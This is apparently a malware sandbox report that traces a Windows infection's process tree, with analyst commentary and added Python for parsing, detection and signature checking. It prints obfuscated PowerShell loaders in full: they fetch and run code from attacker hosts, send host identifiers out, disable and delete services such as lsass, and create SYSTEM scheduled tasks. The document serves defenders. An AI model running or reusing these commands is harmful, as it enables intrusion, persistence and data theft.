  C:\Windows\system32\cmd.exe /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^&MKLUFVRL^&00000000-0000-0000-0000-000000000000^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^|Get-Random -Count 100));test1 -PEBytes $bin"
- [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\ye9zMSruN.exe
  ye9zMSruN.exe -
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
- [depth 2] C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&MKLUFVRL^^^&00000000-0000-0000-0000-000000000000^^^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|ye9zMSruN.exe -
- [depth 3] C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^&MKLUFVRL^&00000000-0000-0000-0000-000000000000^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"
- [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\ye9zMSruN.exe
  ye9zMSruN.exe -
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
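The two cmd.exe command lines above implement one download-and-cache routine for m6.bin and kr.bin: pin an MD5, reuse the copy in %TMP% if it matches, otherwise fetch from http://d.ttr3p.com with a fixed tag, an all-zero GUID and a MAC address in the query string, and fall back to the on-disk copy if the download fails the check. m6.bin is then split at the first 0x0a byte: the text before it is run with IEX (it has to define test1), the bytes after it are gunzipped and passed to `test1 -PEBytes`, and a copy of the decompressed PE with 100 random trailing bytes is written to %TMP%\m6.bin.ori. kr.bin is run with IEX whole. The echoed script is piped into ye9zMSruN.exe, which is invoked with a bare `-`, the form powershell.exe uses to read a script from standard input. The Python below is an added example for analysts, not code from the sample or from the sandbox: it reproduces the cache decision and the m6.bin parsing offline on a constructed blob. The URL, tag and pinned hashes are copied from the command lines; the sample blob, its prelude and its MD5 are made up here and contain no real payload.

```python
import gzip
import hashlib
import random

# Literal values from the two cmd.exe command lines above.
DOWN_URL = "http://d.ttr3p.com"
PINNED_MD5 = {"m6.bin": "dcd9144d509e7c6e1e63ecdd7e50e935",
              "kr.bin": "e04acec7ab98362d87d1c53d84fc4b03"}
BEACON_TAG = "MKLUFVRL"
READ_LIMIT = 10_000_000          # BinaryReader.ReadBytes(10000000)


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def fetch_url(name: str, guid: str, mac: str) -> str:
    """Exact shape of the request the loader sends for m6.bin / kr.bin:
    a fixed tag, a GUID and a MAC address in the query string."""
    return f"{DOWN_URL}/{name}?&{BEACON_TAG}&{guid}&{mac}"


def choose_payload(cached, downloaded, pinned_md5):
    """Mirror the $noup logic: which bytes end up in $con, and why.

    cached is the content of %TMP%\\<name> (None if absent); downloaded is
    the HTTP response (None if no request was made or it failed).
    The last branch is the loader's weak spot: when the download fails the
    MD5 check it silently reuses the on-disk copy, which already failed
    the same check (or does not exist at all).
    """
    if cached is not None and md5_hex(cached) == pinned_md5:
        return cached, "cache-hit"
    if downloaded is not None and md5_hex(downloaded) == pinned_md5:
        return downloaded, "downloaded-and-cached"
    return cached, "stale-cache-fallback"


def split_m6(blob: bytes):
    """m6.bin layout: <PowerShell prelude> 0x0a <gzip(PE)>.

    The loader IEXes everything up to and including the first 0x0a, then
    gunzips the rest (reading at most READ_LIMIT bytes) and passes the
    result to `test1 -PEBytes`, a function the prelude must have defined.
    kr.bin has no such split: the whole file is IEXed as script text.
    """
    nl = blob.find(b"\n")
    if nl < 0:
        raise ValueError("no 0x0a separator: not an m6.bin-style blob")
    prelude = blob[: nl + 1].decode("latin-1")   # -join[char[]] maps bytes 1:1 to chars
    pe = gzip.decompress(blob[nl + 1:])[:READ_LIMIT]
    return prelude, pe


def decoy_copy(pe: bytes, rng=random) -> bytes:
    """What is written to %TMP%\\m6.bin.ori: the PE plus 100 distinct bytes
    from 1..127 ((1..127) | Get-Random -Count 100). The file on disk hashes
    differently on every run; the bytes handed to test1 do not."""
    return pe + bytes(rng.sample(range(1, 128), 100))


def build_sample_blob():
    """Constructed test input, not a real payload: a placeholder prelude that
    defines a no-op test1, then a gzip of a fake PE-looking buffer."""
    prelude = b"function test1{param($PEBytes)}\n"
    fake_pe = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 200
    blob = prelude + gzip.compress(fake_pe)
    return blob, fake_pe, md5_hex(blob)


if __name__ == "__main__":
    blob, fake_pe, pinned = build_sample_blob()
    print(fetch_url("m6.bin", "00000000-0000-0000-0000-000000000000", "F6:48:E9:E4:AC:23"))
    payload, why = choose_payload(None, blob, pinned)
    prelude, pe = split_m6(payload)
    print(why, repr(prelude), pe == fake_pe, len(decoy_copy(pe)))
```

To triage a captured m6.bin, run `split_m6` on the file bytes and hash the returned PE rather than the .bin.ori file: the 100 appended random bytes mean the on-disk copy never matches a known hash, while the in-memory PE does.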
- [depth 4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\rx3ve1h3\rx3ve1h3.cmdline"
- [depth 5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES668B.tmp" "c:\Windows\Temp\rx3ve1h3\CSC7F4257F2AD9C4DEDBEA0412255FCB45.TMP"
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config xWinWpdSrv Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop xWinWpdSrv
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete xWinWpdSrv
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config SVSHost Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop SVSHost
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete SVSHost
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config "Microsoft Telemetry" Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop "Microsoft Telemetry"
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete "Microsoft Telemetry"
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config lsass Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop lsass
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete lsass
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config Microsoft Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop Microsoft
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete Microsoft
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config system Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop system
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete system
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config Oracleupdate Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop Oracleupdate
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete Oracleupdate
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config CLR Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop CLR
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete CLR
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config sysmgt Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop sysmgt
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete sysmgt
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config \gm Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop \gm
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete \gm
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config WmdnPnSN Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop WmdnPnSN
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete WmdnPnSN
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config Sougoudl Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop Sougoudl
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete Sougoudl
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config National Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop National
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete National
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config Nationaaal Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop Nationaaal
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete Nationaaal
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config Natimmonal Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop Natimmonal
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete Natimmonal
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config Nationaloll Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop Nationaloll
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete Nationaloll
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config Nationalmll Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop Nationalmll
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete Nationalmll
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config Nationalaie Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop Nationalaie
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete Nationalaie
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config Nationalwpi Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop Nationalwpi
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete Nationalwpi
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config WinHelp32 Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop WinHelp32
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete WinHelp32
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config WinHelp64 Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop WinHelp64
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete WinHelp64
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config Samserver Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop Samserver
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete Samserver
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config RpcEptManger Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop RpcEptManger
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete RpcEptManger
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config "NetMsmqActiv Media NVIDIA" Start= Disabled
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Stop "NetMsmqActiv Media NVIDIA"
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Delete "NetMsmqActiv Media NVIDIA"
- [depth 4] C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" Config "Sncryption Media Playeq" Start= Disabled
- [depth 2] C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn t.bb3u9.com /F /tr t.bb3u9.com
  - Creates scheduled task(s)
- [depth 2] C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \pMVZHfUeNq /F /tr "powershell -c PS_CMD"
  - Creates scheduled task(s)
- [depth 2] C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /run /tn \pMVZHfUeNq
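The sc.exe block above runs the same three commands (config Start= Disabled, stop, delete) against 25 service names, many of which mimic Windows components (lsass, system, CLR, Microsoft Telemetry); the last name only receives the config step before the run ends. The schtasks lines then create two SYSTEM tasks: one whose /tr is the bare hostname t.bb3u9.com, and \pMVZHfUeNq, which runs `powershell -c PS_CMD` every 60 minutes and is started immediately. The Python below is an added detection example, not part of this report: it runs over process-creation events constructed from those command lines (Sysmon event 1 or Security 4688 would carry the same fields; the parent PIDs are assumed because the report does not pair these lines with PIDs) and flags a parent that fully removes two or more services, plus every SYSTEM scheduled task created with schtasks.

```python
import re
from collections import defaultdict

# Process-creation events constructed from the command lines in this report.
# ppid values are assumed: the report does not say which process spawned
# each sc.exe / schtasks.exe line.
SC = r"C:\Windows\system32\sc.exe"
ST = r"C:\Windows\system32\schtasks.exe"
SAMPLE_EVENTS = [
    {"ppid": 4844, "image": SC, "cmdline": r'"C:\Windows\system32\sc.exe" Config "Microsoft Telemetry" Start= Disabled'},
    {"ppid": 4844, "image": SC, "cmdline": r'"C:\Windows\system32\sc.exe" Stop "Microsoft Telemetry"'},
    {"ppid": 4844, "image": SC, "cmdline": r'"C:\Windows\system32\sc.exe" Delete "Microsoft Telemetry"'},
    {"ppid": 4844, "image": SC, "cmdline": r'"C:\Windows\system32\sc.exe" Config lsass Start= Disabled'},
    {"ppid": 4844, "image": SC, "cmdline": r'"C:\Windows\system32\sc.exe" Stop lsass'},
    {"ppid": 4844, "image": SC, "cmdline": r'"C:\Windows\system32\sc.exe" Delete lsass'},
    {"ppid": 4844, "image": SC, "cmdline": r'"C:\Windows\system32\sc.exe" Config "Sncryption Media Playeq" Start= Disabled'},
    {"ppid": 5072, "image": ST, "cmdline": r'"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn t.bb3u9.com /F /tr t.bb3u9.com'},
    {"ppid": 5072, "image": ST, "cmdline": r'"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \pMVZHfUeNq /F /tr "powershell -c PS_CMD"'},
    {"ppid": 5072, "image": ST, "cmdline": r'"C:\Windows\system32\schtasks.exe" /run /tn \pMVZHfUeNq'},
]

TOKEN = re.compile(r'"[^"]*"|\S+')


def tokens(cmdline: str):
    """Split a Windows command line, keeping quoted arguments whole."""
    return [t.strip('"') for t in TOKEN.findall(cmdline)]


def parse_sc(cmdline: str):
    """('config'|'stop'|'delete', service name) for an sc.exe line, else None."""
    t = tokens(cmdline)
    if len(t) < 3 or not t[0].lower().endswith("sc.exe"):
        return None
    verb = t[1].lower()
    return (verb, t[2]) if verb in ("config", "stop", "delete") else None


def service_removals(events, min_services=2):
    """Services that one parent process disabled, stopped AND deleted.

    Returns {ppid: [service, ...]} for parents that fully removed at least
    min_services services. A lone 'sc config' (as for the last service in
    the tree above) is not enough to fire.
    """
    per_parent = defaultdict(lambda: defaultdict(set))
    for ev in events:
        if ev["image"].lower().endswith("\\sc.exe"):
            parsed = parse_sc(ev["cmdline"])
            if parsed:
                verb, svc = parsed
                per_parent[ev["ppid"]][svc].add(verb)
    hits = {}
    for ppid, services in per_parent.items():
        full = sorted(s for s, v in services.items() if v == {"config", "stop", "delete"})
        if len(full) >= min_services:
            hits[ppid] = full
    return hits


def system_tasks(events):
    """(task name, command) for every schtasks /create that runs as SYSTEM."""
    found = []
    for ev in events:
        if not ev["image"].lower().endswith("\\schtasks.exe"):
            continue
        t = tokens(ev["cmdline"])
        low = [x.lower() for x in t]
        if "/create" not in low or "/ru" not in low:
            continue
        i = low.index("/ru")
        if i + 1 >= len(low) or low[i + 1] != "system":
            continue
        name = t[low.index("/tn") + 1] if "/tn" in low else None
        cmd = t[low.index("/tr") + 1] if "/tr" in low else None
        found.append((name, cmd))
    return found


if __name__ == "__main__":
    print(service_removals(SAMPLE_EVENTS))
    print(system_tasks(SAMPLE_EVENTS))
```

The threshold of two fully removed services is deliberately low for the sample; against real telemetry, key the rule on the parent being a PowerShell host (here the dropped ye9zMSruN.exe) and raise it, since legitimate uninstallers also run config/stop/delete, but rarely against two dozen names in a row.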
- [depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
  - Blocklisted process makes network request
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
- [depth 2] C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4976 -s 2548
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
- [depth 1] C:\Windows\system32\wbem\WmiApSrv.exe
  C:\Windows\system32\wbem\WmiApSrv.exe
- [depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?rep_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
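Both powershell.EXE entries above run the same stager a(), differing only in the tag in the request path (mail_20210218 versus rep_20210218). It fetches http://t.bb3u9.com/a.jsp?...? with COMPUTERNAME, USERNAME, the SMBIOS UUID and a random number joined by '*', treats the first 172 bytes of the reply as the base64 of an RSA signature, skips one separator byte, and IEXes the remainder only if that signature verifies under the embedded 1024-bit public key (RSACryptoServiceProvider.VerifyData with SHA-1, i.e. RSASSA-PKCS1-v1_5). The practical consequence for responders: a sinkholed or spoofed t.bb3u9.com cannot push a stage without the operator's private key, and a sandbox cannot replay one. The Python below is an added example (Python 3.8+, standard library only), not the sample's code and not a recovered key: it parses the wire format with the loader's exact offsets and verifies it the same way. Because the operator's private key is unavailable, it generates a seeded toy RSA-1024 key purely so the demo can produce a reply that verifies, and then shows that a one-byte change to the body, a truncated reply, or a different key is rejected. The real modulus from the command line is included only to confirm its size.

```python
import base64
import hashlib
import hmac
import random

# Copied from the command line above: a 1024-bit modulus and e = 0x01,0x00,0x01.
LOADER_MODULUS_B64 = "2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10="
LOADER_E = 0x010001
SIG_B64_LEN = 172        # $d[0..171]: base64 of a 128-byte RSA-1024 signature
BODY_OFFSET = 173        # $d[173..$c]: byte 172 is a separator the loader skips
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")  # RFC 8017 sec. 9.2


def loader_public_key():
    return int.from_bytes(base64.b64decode(LOADER_MODULUS_B64), "big"), LOADER_E


def parse_response(data: bytes):
    """Split a reply exactly as a() does; None when the reply is too short."""
    if len(data) <= BODY_OFFSET:                      # if($c -gt 173)
        return None
    return base64.b64decode(data[:SIG_B64_LEN]), data[BODY_OFFSET:]


def emsa_pkcs1_v15_sha1(msg: bytes, k: int) -> bytes:
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def rsa_verify_sha1(msg: bytes, sig: bytes, n: int, e: int) -> bool:
    """RSASSA-PKCS1-v1_5 with SHA-1: what RSACryptoServiceProvider.VerifyData
    checks when handed a SHA1CryptoServiceProvider."""
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    s = int.from_bytes(sig, "big")
    if s >= n:
        return False
    em = pow(s, e, n).to_bytes(k, "big")
    return hmac.compare_digest(em, emsa_pkcs1_v15_sha1(msg, k))


def stager_accepts(data: bytes, n: int, e: int) -> bool:
    """True iff the loader would IEX the body of this reply."""
    parsed = parse_response(data)
    return parsed is not None and rsa_verify_sha1(parsed[1], parsed[0], n, e)


# --- demo key material: NOT the operator's key, which only they hold ---
SMALL_PRIMES = [p for p in range(3, 2000, 2)
                if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]


def is_probable_prime(n: int, rng: random.Random, rounds: int = 16) -> bool:
    """Trial division by SMALL_PRIMES, then Miller-Rabin."""
    if n < 2 or n % 2 == 0:
        return n == 2
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def demo_keypair(bits: int = 1024, seed: int = 2021):
    """Seeded toy key so the demo is repeatable. random.Random is not a
    CSPRNG; this must never be used to make real keys."""
    rng = random.Random(seed)

    def prime():
        while True:
            c = rng.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
            if is_probable_prime(c, rng):
                return c

    while True:
        p, q = prime(), prime()
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and phi % LOADER_E and n.bit_length() == bits:
            return n, LOADER_E, pow(LOADER_E, -1, phi)      # Python 3.8+


def build_response(body: bytes, n: int, d: int) -> bytes:
    """Reply in the loader's wire format: base64(sig) || separator || body."""
    k = (n.bit_length() + 7) // 8
    m = int.from_bytes(emsa_pkcs1_v15_sha1(body, k), "big")
    sig_b64 = base64.b64encode(pow(m, d, n).to_bytes(k, "big"))
    assert len(sig_b64) == SIG_B64_LEN
    return sig_b64 + b"\n" + body


if __name__ == "__main__":
    n, e, d = demo_keypair()
    reply = build_response(b"Write-Output 'stage 2'", n, d)
    print(stager_accepts(reply, n, e), stager_accepts(reply[:-1] + b"!", n, e))
    print(loader_public_key()[0].bit_length())
```

The fixed offsets are only consistent with a 1024-bit key (128-byte signature, 172 base64 characters), which the embedded modulus satisfies; the signature covers the body bytes alone, so the URL, the beacon fields and the separator byte are unauthenticated and can be changed freely by anyone in the path without affecting verification.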
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5 d737fc27bbf2f3bd19d1706af83dbe3f
  SHA1 212d219394124968b50769c371121a577d973985
  SHA256 b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
  SHA512 974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
- C:\Windows\System32\WindowsPowerShell\v1.0\ye9zMSruN.exe (listed three times in the run, identical content)
  MD5 f7722b62b4014e0c50adfa9d60cafa1c
  SHA1 f31c17e0453f27be85730e316840f11522ddec3e
  SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
  SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
- C:\Windows\TEMP\RES668B.tmp
  MD5 f7fbb70c122d1ec88bf0abc7ab43758d
  SHA1 1aaa74d706b981b5a2d35e744c992f4c8e7117de
  SHA256 8649c2d8ed4af7264e14baed7d294b7b3ac8963e47f6cb547d23df766a756a4d
  SHA512 6d730f341c3215ac2bfeb5090a2be566390e32b208912c190481e5d82cbaf073f479ea908b45e64c7c733cf230c5733b76c911bb7d95ac74486f1b2f0a5e8b06
